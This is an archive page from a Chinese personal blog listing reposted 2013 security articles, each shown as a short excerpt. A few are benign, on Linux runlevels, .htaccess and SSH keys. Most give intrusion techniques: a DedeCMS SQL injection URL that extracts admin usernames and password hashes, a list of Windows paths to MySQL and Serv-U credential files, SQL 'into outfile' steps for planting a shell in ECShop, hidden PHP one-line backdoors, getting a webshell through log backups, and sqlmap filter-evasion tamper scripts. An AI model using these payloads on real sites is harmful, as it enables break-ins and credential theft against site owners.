• 博客园logo
  • 会员
  • 周边
  • 新闻
  • 博问
  • 闪存
  • 众包
  • 赞助商
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
DemonSpider‘s BLOG
愿我的的剑芒<-|->永远闪耀!
博客园 | 首页 | 新随笔 | 新文章 | 联系 | 订阅 订阅 | 管理

05 2013 档案

 
linux的诸个启动级别:init 0,1,2,3,4,5,6《转》
摘要:0:停机1:单用户形式,只root进行维护2:多用户,不能使用net file system3:完全多用户5:图形化4:安全模式6:重启其实,可以通过查看/etc/rc.d/中的rc*.d的文件来对比理解。。init 0,对应的系统会运行,/etc/rc.d/rc0.d里指定的程序。我们来看下名称。[root@localhost ~]# ls /etc/rc.d/rc0.d K01dnsmasq K15ksmtuned K35nmb K60crond K74lm_sensors K83portreserve K85rpcgssd K88iscsi K90network S00... 阅读全文
posted @ 2013-05-29 17:11 DemonSpider 阅读(336) 评论(0) 推荐(0)
Grep与web漏洞挖掘<转>
摘要:文/SuperHei_[At]_ph4nt0m.org 2006-03-08[a.下面的grep(http://www.interlog.com/~tcharron/grep.html )不支持-r参数,可以使用下面的格式: grep -in "/(include/|require/)" C:/test/*.php C:/test/admin/*.php 也可以使用cygwin移植来的grep(http://zhouzhen.eviloctal.org/Look.asp?LogID=814 ) b.多个关键词or模式使用|,如果使用and模式,可以使用下面的管道模式: gr 阅读全文
posted @ 2013-05-29 09:30 DemonSpider 阅读(354) 评论(0) 推荐(0)
Zenmap的用法《转》
摘要:第一种:Intense scan(nmap -T4 -A -v)一般来说,Intense scan可以满足一般扫描-T4 加快执行速度-A 操作系统及版本探测-v 显示详细的输出第二种:Intense scan plus UDP(nmap -sS -sU -T4 -A -v)即UDP扫描-sS TCP SYN 扫描-sU UDP 扫描第三种:Intense scan,all TCP ports(nmap -p 1-65536 -T4 -A -v)扫描所有TCP端口,范围在1-65535,试图扫描所有端口的开放情况,速度比较慢。-p 指定端口扫描范围第四种:Intense scan,no pin 阅读全文
posted @ 2013-05-19 21:00 DemonSpider 阅读(583) 评论(0) 推荐(0)
[讨论]“传递式”的攻击思想<转LN>
摘要:刚上课的时候走神,脑袋里多出了一些胡思乱想,这儿记下这些胡思乱想和大家讨论。 什么是传递?攻击具有传递性么? a>b,b>c => a>c 这是数学上的传递,飞鸽传书,烽火传讯是信息的传递,心里学上也有传递性的推理,那么攻击可不可以传递呢。 “水坑”攻击模式 a. 目标常访问的网站 b. 目标网站 c.目标人 a存在一个储存性xss,b有个反射性xss 目标人 -----> a -------> b -------> payload 通过a的传递使得攻击更加隐蔽,是不是感觉一种超强“跨域”效果 案例:WooYun: 手把手教你劫持李开复的腾讯微博 我把 阅读全文
posted @ 2013-05-14 21:14 DemonSpider 阅读(182) 评论(0) 推荐(0)
杂七杂八的敏感文件注释<持续更新帖>
摘要:============敏感文件读取================WINDOWS下:c:/boot.ini //查看系统版本c:/windows/php.ini //php配置信息c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt/my.ini c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码 c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密. 阅读全文
posted @ 2013-05-14 09:56 DemonSpider 阅读(428) 评论(0) 推荐(0)
.htaccess设置指南经典说明<转>
摘要:如果你的服务器目录结构是这样:/usr/corsak/www/maindir如果Apache指令中开启了AllowOverride支持.htaccess文件,每访问一次会依次搜索:/usr/corsak/www/maindir/.htaccess /usr/corsak/www/.htaccess /usr/corsak/.htaccess下面是一份详细的文档,不知道哪年从哪找的。 因为在一个国外的空间的根文件夹下看到这个.htaccess,搞不懂是干什么的,在落伍论坛找到一篇文章,先转过来放着,以后再慢慢研究,嘿嘿.. Apache指南: .htaccess文件.htaccess文件提供了针 阅读全文
posted @ 2013-05-12 16:00 DemonSpider 阅读(195) 评论(0) 推荐(0)
无线hacking集合贴,持续更新~
摘要:==================钓鱼篇========================利用Backtrack做Wifi钓鱼 http://www.91ri.org/5123.html《伪造AP简单思路(win7+linux)》 http://www.91ri.org/2863.html《无线Hacking之无线DOS与AP欺骗》。http://www.91ri.org/4901.html伪Soft-AP (wi-fi)架设及捕获数据教程(钓鱼wi-fi架设同数据捕获协议分析)http://hi.baidu.com/tios7ays/item/9ed08675a3dee70ed7a89ca2 阅读全文
posted @ 2013-05-12 15:22 DemonSpider 阅读(341) 评论(0) 推荐(0)
那些强悍的PHP一句话后门《转》
摘要:亦家从建立起就有一个很重要的服务项目 – 安全监测,而上线后很少有相关的佐证内容,那从今天开始也就开始了这一部分的分享与撰写。我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马1234567891011<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 阅读全文
posted @ 2013-05-10 20:47 DemonSpider 阅读(265) 评论(0) 推荐(0)
dede找后台《转》
摘要:From: https://forum.90sec.org/thread-5081-1-1.html首先:注入exp有时候 有些 /plus/目录换成了 /plugins目录/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin` 阅读全文
posted @ 2013-05-09 00:30 DemonSpider 阅读(448) 评论(0) 推荐(0)
sqlmap绕过脚本tamper解析<转>
摘要:apostrophemask.py UTF-8编码 Example: * Input: AND '1'='1' * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87 apostrophenullencode.py unicode编码 Example: * Input: AND '1'='1' * Output: AND %00%271%00%27=%00%271%00%27 appendnullbyte.py 添加%00 Example: * Input: AND 1=1 * 阅读全文
posted @ 2013-05-09 00:25 DemonSpider 阅读(750) 评论(0) 推荐(0)
Backup log to get a webshell<转>
摘要:dbowner 通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入信息,可能备份出来得到的还是一些不能用的500错误,如何能够提高成功率及重用性呢?如果单从调整增量备份的方式来看,尽管能够达到一些效果,但是方法比较复杂而且效果不明显。加上关于重用性的考虑,例如多次备份的成功率,backupdatabase的方法并不太适用。这里将要讲述的是另外一个备份的方法,导出日志文件到web目录来获得shell。获得webshell首先要知道物理路径。关于物理路径的暴露有很多方法,注入也可以得到,就不再多说。值得注意的是,如果 阅读全文
posted @ 2013-05-08 00:31 DemonSpider 阅读(302) 评论(0) 推荐(0)
Linux SSH使用公钥私钥实现免登陆 以及 登陆失败、公钥失效的处理<转>
摘要:=====================同级参考资料:《linux--私钥登陆》http://mengsir.blog.51cto.com/2992083/908342写shell免不了要远程执行shell命令,自然就要实现免登陆。免登陆的原理:============================首先说明一下处理机制: 1.非对称密钥就是一对密钥-公钥和私钥。 2.私钥由系统中没个人自己持有,一般保存在自己的电脑里或u盘里。 3.公钥则在网络上传递,就是可以传递给通信中的对方,也就意味这可以被黑客截获。 4.用某个人的私钥加密的数据只有用那个人的公钥解密,同样用公钥加密的数据也只... 阅读全文
posted @ 2013-05-06 14:35 DemonSpider 阅读(919) 评论(0) 推荐(0)
突破远程桌面限制<转载>
摘要:00x00 起因连接远程桌面的时服务器出现如下提示:1You are not allowed to access to this Terminal Server. Please contact your administrator for more information. Secured by SecureRDP.仔细一看不是远程管理组的问题,而是SecureRDP这个软件限制造成SecureRDP是一款用户登录服务器管理软件.防止非法用户试图暴力破解用户密码;可以过滤IP/MAC地址、计算机名等.具体有以下功能: 1.连接限制 允许按照登陆时间,IP地址,主机名,MAC地址,Clien.. 阅读全文
posted @ 2013-05-05 23:55 DemonSpider 阅读(409) 评论(0) 推荐(0)
ECSHOP拿shell总结《转》
摘要:ecshop后台拿shell总结 ecshop拿shell一、系统==>数据库管理==>sql查询(可爆出物理路径):==============创建表失败,导不出shell======================show databases; use 数据库名; create a(cmd text not null); insert into a(cmd) values(‘‘); select cmd from a into outfile ‘导出路径’; drop table if exists a;==================创建表失败,导不出shell===== 阅读全文
posted @ 2013-05-01 19:58 DemonSpider 阅读(534) 评论(0) 推荐(0)
 

公告


博客园  ©  2004-2026
浙公网安备 33010602011771号 浙ICP备2021040463号-3